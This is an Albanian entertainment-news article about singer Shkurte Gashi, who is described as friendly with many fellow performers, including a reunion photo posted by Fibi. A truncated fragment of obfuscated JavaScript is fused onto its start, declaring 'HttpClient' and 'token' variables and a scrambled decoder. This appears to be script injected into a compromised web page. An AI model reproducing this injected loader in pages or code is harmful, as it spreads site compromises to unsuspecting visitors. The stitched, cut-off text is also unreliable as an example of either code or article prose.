;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Shkurta, këngëtarja që e ka mirë me krejt kolegët!

By

Se estrada shqiptare është e mbushur me xhelozi dhe rivalitet, ky tashmë është një fakt i ditur. Të shumtë janë ata që realisht nuk flasin mes vete apo janë të ndarë në lloj të klaneve.

Megjithatë, duket se ka edhe artistë të tillë që pa problem e kanë mirë me të gjithë. E tillë është këngëtarja Shkurte Gashi e cila nuk ka ditë që nuk shihet me kolegë në rrjete sociale teksa kalon kohë të mirë me ta.

E kemi parë me Kidën, Dafinën, Noizyn,Teuta Selimin, Ryvën, Danin e Mozzik. Në planin artistik, bashkëpunime ka pasur me Bleron, Flori Mumajesin e të tjerë. Secili prej tyre, për Shkurtën ka vetëm fjalë të mira.

E fundit që i është gëzuar një ritakimi me këngëtaren, është Fibi. Ajo në rrjetin social Instagram ka postuar një foto me Shkurtën nën mbishkrimin: Me këtë bukuri. Po e takojmë njëra-tjetrën pas shumë viteve. Jeta është e mrekullueshme.

Krahas mbrëmjeve të shumta muzikore gjithandej ku flitet shqip, këngëtarja Shkurte Gashi është në përgatitje të projekteve të reja që priten të publikohen shumë shpejt. /Prive.al/

 

Artikuj të ngjashëm